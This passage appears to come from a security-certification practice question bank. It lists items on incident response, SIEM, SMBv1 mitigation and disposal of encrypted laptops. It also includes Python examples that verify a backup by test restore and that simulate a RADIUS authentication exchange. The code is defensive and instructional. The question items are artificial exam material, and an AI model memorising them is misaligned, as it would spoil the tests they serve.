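            for p in sorted(root.rglob("*")) if p.is_file()}


def backup(src, archive):
    """Write a gzipped tar of src and return the manifest taken at backup time.
    Keep the manifest apart from the archive: it is what a restore test checks against."""
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(src, arcname=".")
    return make_manifest(src)


def verify_restore(archive, manifest):
    """Restore into a scratch directory and compare every file against the manifest.
    Returns (ok, problems). The job's own 'Completed successfully' status is never consulted."""
    with tempfile.TemporaryDirectory() as scratch:
        try:
            with tarfile.open(archive, "r:gz") as tar:
                try:
                    tar.extractall(scratch, filter="data")  # reject absolute paths and traversal
                except TypeError:
                    tar.extractall(scratch)                  # interpreter without extraction filters
        except (tarfile.TarError, OSError, EOFError, zlib.error) as exc:
            return False, [f"restore failed: {exc}"]
        restored = make_manifest(scratch)
    problems = [f"missing after restore: {rel}" for rel in manifest if rel not in restored]
    problems += [f"hash mismatch: {rel}" for rel, digest in manifest.items()
                 if rel in restored and restored[rel] != digest]
    return not problems, problems


def demo():
    """Constructed data: a good nightly backup, then the same job with a truncated archive."""
    with tempfile.TemporaryDirectory() as work:
        src = Path(work) / "share"
        (src / "finance").mkdir(parents=True)
        (src / "finance" / "q1.csv").write_bytes(b"constructed sample row\n" * 200)
        (src / "readme.txt").write_text("constructed sample file\n")
        archive = Path(work) / "nightly.tgz"
        manifest = backup(src, archive)
        good = verify_restore(archive, manifest)
        # Simulate a backup the console reported as successful but that was cut short.
        archive.write_bytes(archive.read_bytes()[:40])
        bad = verify_restore(archive, manifest)
    return good, bad


if __name__ == "__main__":
    good, bad = demo()
    print("intact archive:", good)
    print("truncated archive:", bad)
```

A scheduled restore test of this kind is what turns "the job said OK" into evidence that recovery works; it would also have caught the rotated service-account password in Question 279 before an incident did.
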
Question 280 (medium, multiple choice)

A manager asks the security team to let Human Resources inspect the files on a laptop suspected of containing stolen customer data before IT touches it. What is the best response?

Question 281 (medium, multiple choice)

An organization is retiring a batch of laptops with SSDs. All of the systems used full-disk encryption and stored sensitive internal documents. What is the best action before the devices leave the company?

Question 282 (medium, multiple choice)

A vulnerability scan finds that an old print server still has SMBv1 enabled. The business says the vendor will not support a patch for at least two months, but the server must stay online. What is the best temporary mitigation?

Question 283 (easy, multiple choice)

A security scan finds a critical patch missing on a public-facing web server. The patch has already been tested in the lab and approved for deployment. What should the operations team do next?

Question 284 (medium, multi-select)

A security analyst is reviewing incident response procedures. Which three of the following activities are typically performed during the 'Containment, Eradication, and Recovery' phase of the incident response process? (Choose three.)

Question 285 (medium, multi-select)

An organization is implementing a new Security Information and Event Management (SIEM) system. Which three of the following are primary capabilities that a SIEM provides to support security operations? (Choose three.)

Question 286 (medium, multi-select)

A company is implementing controls to protect against insider threats. Which three of the following controls are most effective for detecting and preventing data exfiltration by a malicious insider? (Choose three.)

Question 287 (medium, multi-select)

A security operations center (SOC) analyst is investigating a potential malware outbreak. Which three of the following indicators of compromise (IOCs) would provide the strongest evidence of malicious activity? (Choose three.)

Question 288 (medium, multi-select)

A security analyst is reviewing the organization's incident response procedures. According to the NIST SP 800-61 framework, which four of the following are recognized phases of the incident response lifecycle? (Choose four.)

Question 289 (medium, multi-select)

An organization is implementing a Security Information and Event Management (SIEM) system to enhance its security monitoring capabilities. Which four of the following are primary functions of a SIEM? (Choose four.)

Question 290 (medium, drag order)

Drag and drop the steps for the RADIUS authentication process into the correct order.

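Worked example for Question 290. This is an added illustration, not part of the Courseiva question set and not the question's own step list: it plays both sides of a RADIUS Access-Request/Access-Accept exchange as specified in RFC 2865, so the order of operations is visible in code. The NAS generates a random Request Authenticator, hides the User-Password with the MD5-based XOR scheme, and sends the Access-Request; the server recovers the password, decides, and signs its reply with the Response Authenticator; the NAS recomputes that signature before trusting Accept or Reject. Usernames, passwords, the shared secret and the user database are assumptions made for the example, and only the two attributes needed for the exchange are encoded.

```python
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3   # RFC 2865 packet codes
USER_NAME, USER_PASSWORD = 1, 2                         # RFC 2865 attribute types


def attr(atype, value):
    """Type-Length-Value encoding; Length counts the 2-byte header."""
    return bytes([atype, len(value) + 2]) + value


def hide_password(password, secret, request_auth):
    """RFC 2865 section 5.2: pad to 16-byte blocks and XOR block i with
    MD5(secret + previous ciphertext block), seeding the chain with the Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        block = bytes(p ^ b for p, b in zip(padded[i:i + 16], hashlib.md5(secret + prev).digest()))
        out, prev = out + block, block
    return out


def reveal_password(hidden, secret, request_auth):
    """Inverse of hide_password; trailing NULs are padding."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        out += bytes(c ^ b for c, b in zip(hidden[i:i + 16], hashlib.md5(secret + prev).digest()))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def parse(pkt):
    """Return (code, identifier, authenticator, {attribute_type: value})."""
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    attrs, i = {}, 20
    while i < length:
        atype, alen = pkt[i], pkt[i + 1]
        if alen < 2:
            raise ValueError("malformed attribute")
        attrs[atype] = pkt[i + 2:i + alen]
        i += alen
    return code, ident, pkt[4:20], attrs


def nas_access_request(ident, username, password, secret):
    """NAS side: a fresh random Request Authenticator per request, then the Access-Request."""
    req_auth = os.urandom(16)
    body = attr(USER_NAME, username) + attr(USER_PASSWORD, hide_password(password, secret, req_auth))
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(body)) + req_auth + body, req_auth


def server_respond(pkt, secret, user_db):
    """Server side: recover the password, decide, and sign the reply with
    Response Authenticator = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    code, ident, req_auth, attrs = parse(pkt)
    if code != ACCESS_REQUEST:
        raise ValueError("expected Access-Request")
    pw = reveal_password(attrs[USER_PASSWORD], secret, req_auth)
    decision = ACCESS_ACCEPT if user_db.get(attrs[USER_NAME]) == pw else ACCESS_REJECT
    header = struct.pack("!BBH", decision, ident, 20)   # no reply attributes in this example
    return header + hashlib.md5(header + req_auth + secret).digest()


def nas_verify_reply(reply, req_auth, secret):
    """NAS side: recompute the Response Authenticator before trusting Accept or Reject."""
    code, _, resp_auth, _ = parse(reply)
    expected = hashlib.md5(reply[:4] + req_auth + reply[20:] + secret).digest()
    if not hmac.compare_digest(expected, resp_auth):
        return "tampered"
    return "accept" if code == ACCESS_ACCEPT else "reject"


def exchange(username, password, nas_secret, user_db, server_secret=None, ident=7):
    """Full round trip; a different server_secret models a misconfigured or rogue server."""
    server_secret = nas_secret if server_secret is None else server_secret
    pkt, req_auth = nas_access_request(ident, username, password, nas_secret)
    return nas_verify_reply(server_respond(pkt, server_secret, user_db), req_auth, nas_secret)


if __name__ == "__main__":
    db = {b"alice": b"correct horse"}
    print(exchange(b"alice", b"correct horse", b"s3cret", db))
    print(exchange(b"alice", b"wrong", b"s3cret", db))
    print(exchange(b"alice", b"correct horse", b"s3cret", db, server_secret=b"other"))
```

Two points the code makes concrete: the only thing protecting the password on the wire is MD5 keyed with the shared secret, so a weak or reused secret exposes every password that transits the NAS, and the server's decision is authenticated only by that same secret. This is why RADIUS over an untrusted network is normally wrapped in TLS (RadSec, RFC 6614) rather than sent as bare UDP.
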
Question 291 (medium, drag order)

Drag and drop the steps to implement a backup strategy following the 3-2-1 rule into the correct order.

